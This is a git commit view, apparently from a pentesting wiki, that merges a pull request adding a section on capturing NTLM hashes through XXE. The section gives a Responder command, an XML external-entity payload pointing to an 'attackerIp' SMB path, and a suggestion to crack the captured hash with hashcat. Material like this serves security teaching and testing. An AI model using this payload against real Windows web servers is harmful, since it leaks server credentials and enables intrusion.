Merge pull request #333 from looCiprian/master

Updated XXE attacks by adding NTLM
This commit is contained in:
Carlos Polop 2022-05-07 20:20:00 +01:00 committed by GitHub
commit e445f7a87c
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -423,6 +423,25 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
![](<../.gitbook/assets/image (531).png>)
### Getting NTML
On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
```
Responder.py -I eth0 -v
```
and by sending the following request
```
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
Then you can try to crack the hash using hashcat
# Hidden XXE Surfaces
## XInclude